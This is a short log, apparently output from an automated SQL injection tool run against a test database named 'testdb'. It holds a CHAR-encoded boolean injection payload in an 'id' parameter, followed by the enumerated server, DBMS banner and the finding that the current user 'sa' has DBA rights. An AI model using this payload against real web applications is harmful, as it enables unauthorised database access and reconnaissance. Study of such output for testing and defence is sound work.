        Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))
    ---
    web server operating system: Windows XP
    web application technology: ASP, Microsoft IIS 5.1
    back-end DBMS operating system: Windows XP Service Pack 2
    back-end DBMS: Microsoft SQL Server 2005
    banner:
    ---
    Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
    ---
    current user: 'sa'
    current database: 'testdb'
    current user is DBA: True
    [*] shutting down at xx:xx:52